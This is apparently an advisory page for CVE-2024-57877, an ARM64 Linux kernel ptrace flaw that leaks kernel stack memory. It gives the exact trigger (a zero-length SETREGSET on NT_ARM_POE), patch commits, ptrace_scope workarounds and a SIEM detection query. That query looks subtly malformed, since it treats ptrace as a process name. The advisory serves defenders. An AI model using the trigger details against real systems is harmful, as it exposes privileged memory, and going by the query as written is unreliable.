CVE-2024-57877
📋 TL;DR
This CVE describes an information disclosure vulnerability in the Linux kernel's ARM64 ptrace subsystem. When a zero-length SETREGSET call is made to the NT_ARM_POE register, uninitialized kernel stack memory (up to 64 bits) can be leaked to userspace. This affects Linux systems running on ARM64 architecture with vulnerable kernel versions.
💻 Affected Systems
- Linux Kernel
📦 What is this software?
Linux Kernel by Linux
The Linux Kernel is the core component of the Linux operating system, serving as the critical interface between computer hardware and software processes. As the heart of millions of servers, cloud infrastructure, embedded systems, Android devices, and IoT deployments worldwide, the Linux Kernel mana...
Learn more about Linux Kernel →Linux Kernel by Linux
The Linux Kernel is the core component of the Linux operating system, serving as the critical interface between computer hardware and software processes. As the heart of millions of servers, cloud infrastructure, embedded systems, Android devices, and IoT deployments worldwide, the Linux Kernel mana...
Learn more about Linux Kernel →⚠️ Risk & Real-World Impact
Worst Case
An attacker with local access could read sensitive kernel memory contents, potentially exposing cryptographic keys, process information, or other privileged data from the kernel stack.
Likely Case
Local information disclosure where an attacker can read limited kernel stack data from a specific memory location, but cannot control what data is leaked.
If Mitigated
With proper access controls, only privileged users can exploit this vulnerability, limiting exposure to authorized administrators.
🎯 Exploit Status
The CVE description includes example exploit code (poe-test). Exploitation requires local access and ptrace permissions. The vulnerability only provides read access to specific kernel stack memory.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Patches available in stable kernel trees (commits 4105dd76bc8ad6529d47157ef0565cb84ca6676c and 594bfc4947c4fcabba1318d8384c61a29a6b89fb)
Vendor Advisory: https://git.kernel.org/stable/c/4105dd76bc8ad6529d47157ef0565cb84ca6676c
Restart Required: Yes
Instructions:
1. Update to a patched Linux kernel version from your distribution vendor. 2. For custom kernels, apply the fix from the stable kernel tree. 3. Reboot the system to load the new kernel.
🔧 Temporary Workarounds
Restrict ptrace access
linuxLimit which users and processes can use ptrace to reduce attack surface
echo 1 > /proc/sys/kernel/yama/ptrace_scope
sysctl -w kernel.yama.ptrace_scope=1
Use mandatory access controls
linuxConfigure SELinux or AppArmor to restrict ptrace system calls
🧯 If You Can't Patch
- Implement strict ptrace restrictions using kernel.yama.ptrace_scope or mandatory access controls
- Monitor for suspicious ptrace activity and restrict user privileges on affected systems
🔍 How to Verify
Check if Vulnerable:
Check kernel version and architecture. If running ARM64 Linux with unpatched kernel, assume vulnerable. Test with the poe-test program from CVE description.Check Version:
uname -rVerify Fix Applied:
Verify kernel version includes the fix commits or test with poe-test program to ensure zero-length writes don't leak memory.📡 Detection & Monitoring
Log Indicators:
- Unusual ptrace system calls, particularly SETREGSET with NT_ARM_POE register
Network Indicators:
- None - this is a local vulnerability
SIEM Query:
process.name="ptrace" AND syscall.args.nt=0x40f AND syscall.args.len=0